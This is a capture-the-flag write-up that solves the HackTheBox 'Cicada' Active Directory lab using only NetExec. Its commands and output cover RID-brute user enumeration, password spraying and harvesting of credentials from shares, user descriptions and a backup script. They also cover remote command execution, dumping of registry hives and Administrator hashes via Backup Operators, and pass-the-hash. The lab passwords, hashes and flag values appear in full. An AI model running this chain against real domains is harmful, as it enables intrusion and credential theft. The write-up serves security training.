This post simply demonstrates how to solve the machine using only NetExec. For a more in-depth walkthrough, check out ippsec’s video and 0xdf’s writeup
Cicada is an easy Active Directory machine from HackTheBox. The core concepts here are users enumeration, password spraying, SMB shares and Backup Operators group. In this writeup, I will walk through the entire machine using only NetExec .
Make sure you have the latest version of Netexec by upgrading it with pipx using the following command
1 2 ➜ pipx upgrade netexec upgraded package netexec from 1.3.0+a5ec90e4 to 1.3.0+8046495d (location: /home/serioton/.local/pipx/venvs/netexec)
USER Enumeration First, we use the --generate-hosts-file option, which automatically retrieves the domain name and netbios name, then generates an entry we can add to our /etc/hosts file
1 2 ➜ nxc smb 10.10.11.35 --generate-hosts-file hosts SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
1 2 ➜ cat hosts 10.10.11.35 CICADA-DC CICADA-DC.cicada.htb cicada.htb
SMB Let’s attempt guest authentication by using any username and password. As you can see, we are able to list shares with guest access. There are non-default shares named “HR” and “DEV”, let’s take note of them
1 2 3 4 5 6 7 8 9 10 11 12 13 ➜ nxc smb 10.10.11.35 -u a -p '' --shares SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest) SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------ SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin SMB 10.10.11.35 445 CICADA-DC C$ Default share SMB 10.10.11.35 445 CICADA-DC DEV SMB 10.10.11.35 445 CICADA-DC HR READ SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share
Now, let’s use the --rid-brute option to enumerate domain users
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 ➜ nxc smb 10.10.11.35 -u a -p '' --rid-brute SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest) SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias) SMB 10.10.11.35 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser) SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup) SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
We can clean up the output to get a nice list of users
1 2 3 4 5 6 ➜ cat tmp | cut -d '\' -f2 | awk '{print $1}' john.smoulder sarah.dantelia michael.wrightson david.orelious emily.oscars
Another thing we can try is the spider_plus module, which searches file shares with read access
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 ➜ nxc smb 10.10.11.35 -u a -p '' -M spider_plus SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest) SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Started module spidering_plus with the following options: SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] DOWNLOAD_FLAG: False SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] STATS_FLAG: True SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_FILTER: ['print$', 'ipc$'] SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_EXTS: ['ico', 'lnk'] SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] MAX_FILE_SIZE: 50 KB SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------ SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin SMB 10.10.11.35 445 CICADA-DC C$ Default share SMB 10.10.11.35 445 CICADA-DC DEV SMB 10.10.11.35 445 CICADA-DC HR READ SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share SPIDER_PLUS 10.10.11.35 445 CICADA-DC [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.35.json". SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Shares: 7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL) SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Readable Shares: 2 (HR, IPC$) SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Filtered Shares: 1 SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total folders found: 0 SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total files found: 1 SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size average: 1.24 KB SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size min: 1.24 KB SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size max: 1.24 KB
The spider_plus module saves the list of files in a json file. In our case, it dumped the results in “/tmp/nxc_hosted/nxc_spider_plus/10.10.11.35.json”. Looking at the output, we can see a file inside the HR share called “Notice from HR.txt”, which we have read access to
1 2 3 4 5 6 7 8 9 10 { "HR" : { "Notice from HR.txt" : { "atime_epoch" : "2024-08-28 18:31:48" , "ctime_epoch" : "2024-03-14 13:29:03" , "mtime_epoch" : "2024-08-28 18:31:48" , "size" : "1.24 KB" } } }
We can use the --get-file option along with the --share option to grab the file to our local machine
1 2 3 4 5 ➜ nxc smb 10.10.11.35 -u a -p '' --get-file 'Notice from HR.txt' notice-from-hr.txt --share HR SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest) SMB 10.10.11.35 445 CICADA-DC [*] Copying "Notice from HR.txt" to "notice-from-hr.txt" SMB 10.10.11.35 445 CICADA-DC [+] File "Notice from HR.txt" was downloaded to "notice-from-hr.txt"
Inspecting the file reveals a plaintext password
1 2 3 4 ➜ cat notice-from-hr.txt ... Your default password is: Cicada$M6Corpb*@Lp#nZp!8 ...
Since we dont know which user that password belongs to, we can spray it with the list of users we gathered earlier. In this case, we get a hit for the user “michael.wrightson”
1 2 3 4 5 ➜ nxc smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) ... SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 ...
With these credentials in hand, we can use the --users flag to enumerate more users and check their descriptions, as some users may store their passwords there
1 2 3 4 5 6 7 8 9 10 11 12 13 ➜ nxc ldap 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users LDAP 10.10.11.35 389 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 LDAP 10.10.11.35 389 CICADA-DC [*] Enumerated 8 domain users: cicada.htb LDAP 10.10.11.35 389 CICADA-DC -Username- -Last PW Set- -BadPW- -Description- LDAP 10.10.11.35 389 CICADA-DC Administrator 2024-08-26 20:08:03 10 Built-in account for administering the computer/domain LDAP 10.10.11.35 389 CICADA-DC Guest 2024-08-28 17:26:56 0 Built-in account for guest access to the computer/domain LDAP 10.10.11.35 389 CICADA-DC krbtgt 2024-03-14 11:14:10 4 Key Distribution Center Service Account LDAP 10.10.11.35 389 CICADA-DC john.smoulder 2024-03-14 12:17:29 1 LDAP 10.10.11.35 389 CICADA-DC sarah.dantelia 2024-03-14 12:17:29 1 LDAP 10.10.11.35 389 CICADA-DC michael.wrightson 2024-03-14 12:17:29 1 LDAP 10.10.11.35 389 CICADA-DC david.orelious 2024-03-14 12:17:29 1 Just in case I forget my password is aRt$Lp#7t*VQ!3 LDAP 10.10.11.35 389 CICADA-DC emily.oscars 2024-08-22 21:20:17 1
Or, we can use the get-desc-users module for ldap, which only retrieves the descriptions of the users
1 2 3 4 5 6 7 8 ➜ nxc ldap 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -M get-desc-users LDAP 10.10.11.35 389 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 GET-DESC... 10.10.11.35 389 CICADA-DC [+] Found following users: GET-DESC... 10.10.11.35 389 CICADA-DC User: Administrator description: Built-in account for administering the computer/domain GET-DESC... 10.10.11.35 389 CICADA-DC User: Guest description: Built-in account for guest access to the computer/domain GET-DESC... 10.10.11.35 389 CICADA-DC User: krbtgt description: Key Distribution Center Service Account GET-DESC... 10.10.11.35 389 CICADA-DC User: david.orelious description: Just in case I forget my password is aRt$Lp#7t*VQ!3
We can see a note in david.orelious’ description revealing his password
1 2 3 ➜ nxc smb 10.10.11.35 -u david.orelious -p 'aRt$Lp#7t*VQ!3' SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
Let’s check if our new user has access to the DEV share using the --shares option
1 2 3 4 5 6 7 8 9 10 11 12 13 ➜ nxc smb 10.10.11.35 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------ SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin SMB 10.10.11.35 445 CICADA-DC C$ Default share SMB 10.10.11.35 445 CICADA-DC DEV READ SMB 10.10.11.35 445 CICADA-DC HR READ SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
Indeed, the user has read access to that share. Once again, let’s use the spider_plus module to look for interesting files
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 ➜ nxc smb 10.10.11.35 -u david.orelious -p 'aRt$Lp#7t*VQ!3' -M spider_plus SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Started module spidering_plus with the following options: SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] DOWNLOAD_FLAG: False SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] STATS_FLAG: True SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_FILTER: ['print$', 'ipc$'] SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] EXCLUDE_EXTS: ['ico', 'lnk'] SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] MAX_FILE_SIZE: 50 KB SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------ SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin SMB 10.10.11.35 445 CICADA-DC C$ Default share SMB 10.10.11.35 445 CICADA-DC DEV READ SMB 10.10.11.35 445 CICADA-DC HR READ SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share SPIDER_PLUS 10.10.11.35 445 CICADA-DC [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.35.json". SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Shares: 7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL) SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Readable Shares: 5 (DEV, HR, IPC$, NETLOGON, SYSVOL) SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] SMB Filtered Shares: 1 SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total folders found: 33 SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] Total files found: 12 SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size average: 1.09 KB SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size min: 23 B SPIDER_PLUS 10.10.11.35 445 CICADA-DC [*] File size max: 5.22 KB
There’s a PowerShell script called “Backup_script.ps1” inside the share
1 2 3 4 5 6 7 8 "DEV" : { "Backup_script.ps1" : { "atime_epoch" : "2024-08-28 18:28:22" , "ctime_epoch" : "2024-03-14 13:31:38" , "mtime_epoch" : "2024-08-28 18:28:22" , "size" : "601 B" } }
We can use the same command as before to download the PowerShell script from the DEV share
1 2 3 4 5 ➜ nxc smb 10.10.11.35 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --get-file 'Backup_script.ps1' Backup_script.ps1 --share DEV SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 SMB 10.10.11.35 445 CICADA-DC [*] Copying "Backup_script.ps1" to "Backup_script.ps1" SMB 10.10.11.35 445 CICADA-DC [+] File "Backup_script.ps1" was downloaded to "Backup_script.ps1"
Looking through the script, we find hardcoded credentials for the user emily.oscars
1 2 3 4 5 6 7 8 9 10 11 12 13 ➜ cat Backup_script.ps1 $sourceDirectory = "C:\smb" $destinationDirectory = "D:\Backup" $username = "emily.oscars" $password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force $credentials = New-Object System.Management.Automation.PSCredential($username, $password) $dateStamp = Get-Date -Format "yyyyMMdd_HHmmss" $backupFileName = "smb_backup_$dateStamp.zip" $backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
These credentials are valid for SMB
1 2 3 ➜ nxc smb 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt
They also work for winrm and we can PsRemote (Pwn3d!)
1 2 3 ➜ nxc winrm 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) WINRM 10.10.11.35 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
I can’t use Evil-WinRM here to grab the flag since I’m only using NetExec for this walkthrough… oh wait, NetExec has an option to execute PowerShell commands remotely using the -X option—so I can grab the flag anyway!
1 2 3 4 5 ➜ nxc winrm 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -X 'cat C:\Users\emily.oscars.CICADA\desktop\user.txt' WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) WINRM 10.10.11.35 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!) WINRM 10.10.11.35 5985 CICADA-DC [+] Executed command (shell type: powershell) WINRM 10.10.11.35 5985 CICADA-DC e8dbd384bcc5a717e0f57b0c4ee359fb
Root Let’s start by checking which groups our user belongs to using the groupmembership module for LDAP
1 2 3 4 5 6 7 ➜ nxc ldap 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -M groupmembership -o USER="emily.oscars" LDAP 10.10.11.35 389 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb) LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!) GROUPMEM... 10.10.11.35 389 CICADA-DC [+] User: emily.oscars is member of following groups: GROUPMEM... 10.10.11.35 389 CICADA-DC Remote Management Users GROUPMEM... 10.10.11.35 389 CICADA-DC Backup Operators GROUPMEM... 10.10.11.35 389 CICADA-DC Domain Users
Looking at the output, we see that our user is a member of the Backup Operators group, a high-privilege group. This allows us to dump NTDS
Backup Operators Recently, @mpgn_x64 (https://x.com/mpgn_x64 ) added a new module to Netexec called backup_operator which is a very neat addition! Thanks for that
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ➜ nxc smb 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -M backup_operator SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt BACKUP_O... 10.10.11.35 445 CICADA-DC [*] Triggering RemoteRegistry to start through named pipe... BACKUP_O... 10.10.11.35 445 CICADA-DC Saved HKLM\SAM to \\10.10.11.35\SYSVOL\SAM BACKUP_O... 10.10.11.35 445 CICADA-DC Saved HKLM\SYSTEM to \\10.10.11.35\SYSVOL\SYSTEM BACKUP_O... 10.10.11.35 445 CICADA-DC Saved HKLM\SECURITY to \\10.10.11.35\SYSVOL\SECURITY SMB 10.10.11.35 445 CICADA-DC [*] Copying "SAM" to "/home/serioton/.nxc/logs/CICADA-DC_10.10.11.35_2025-02-11_185959.SAM" SMB 10.10.11.35 445 CICADA-DC [+] File "SAM" was downloaded to "/home/serioton/.nxc/logs/CICADA-DC_10.10.11.35_2025-02-11_185959.SAM" SMB 10.10.11.35 445 CICADA-DC [*] Copying "SECURITY" to "/home/serioton/.nxc/logs/CICADA-DC_10.10.11.35_2025-02-11_185959.SECURITY" SMB 10.10.11.35 445 CICADA-DC [+] File "SECURITY" was downloaded to "/home/serioton/.nxc/logs/CICADA-DC_10.10.11.35_2025-02-11_185959.SECURITY" SMB 10.10.11.35 445 CICADA-DC [*] Copying "SYSTEM" to "/home/serioton/.nxc/logs/CICADA-DC_10.10.11.35_2025-02-11_185959.SYSTEM" SMB 10.10.11.35 445 CICADA-DC [+] File "SYSTEM" was downloaded to "/home/serioton/.nxc/logs/CICADA-DC_10.10.11.35_2025-02-11_185959.SYSTEM" BACKUP_O... 10.10.11.35 445 CICADA-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341::: BACKUP_O... 10.10.11.35 445 CICADA-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: BACKUP_O... 10.10.11.35 445 CICADA-DC DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: BACKUP_O... 10.10.11.35 445 CICADA-DC $MACHINE.ACC:plain_password_hex:6209748a5ab74c44bd98fc5015b6646467841a634c4a1b2d6733289c33f76fc6427f7ccd8f6d978a79eec3ae49eb8c0b5b14e193ec484ea1152e8a04e01a3403b3111c0373d126a566660a7dd083aec1921d53a82bc5129408627ae5be5e945ed58cfb77a2a50e9ffe7e6a4531febd965181e528815d264885921118fb7a74eff51306dbffa4d6a0c995be5c35063576fc4a3eba39d0168d4601da0a0c12748ae870ff36d7fb044649032f550f04c017f6d94675b3517d06450561c71ddf8734100898bf2c19359c69d1070977f070e3b8180210a92488534726005588c0f269a7e182c3c04b96f7b5bc4af488e128f8 BACKUP_O... 10.10.11.35 445 CICADA-DC $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696 BACKUP_O... 10.10.11.35 445 CICADA-DC dpapi_machinekey:0x0e3d4a419282c47327eb03989632b3bef8998f71 dpapi_userkey:0x4bb80d985193ae360a4d97f3ca06350b02549fbb BACKUP_O... 10.10.11.35 445 CICADA-DC NL$KM:cc1501f764391e7a5e538cc174e62b01369b50b8d07223d9b6c56e922f5708d81eba8e8123250327364c19b496cd251f8ff97f5d71e66e8cffcbeb5e4ea4e696 SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\Administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!) BACKUP_O... 10.10.11.35 445 CICADA-DC [*] Dumping NTDS... SMB 10.10.11.35 445 CICADA-DC [+] Dumping the NTDS, this could take a while so go grab a redbull... SMB 10.10.11.35 445 CICADA-DC [-] Could not connect: timed out BACKUP_O... 10.10.11.35 445 CICADA-DC [*] Cleaning dump with user Administrator and hash 2b87e7c93a3e8a0ea4a581937016f341 on domain cicada.htb BACKUP_O... 10.10.11.35 445 CICADA-DC [*] Successfully deleted dump files !
This module handles everything for us and dumps the Administrator hash. We can use this hash to login to the box and read the root flag
1 2 3 ➜ nxc smb 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341 SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)
In fact, why even bother logging into the box when we can just grab the flag directly with -x? (Thanks to Pwn3d! 😎)
1 2 3 4 5 ➜ nxc smb 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -x 'type \users\administrator\desktop\root.txt' SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!) SMB 10.10.11.35 445 CICADA-DC [+] Executed command via wmiexec SMB 10.10.11.35 445 CICADA-DC 56662e5d83f25a4649005343c5f33997
Resources
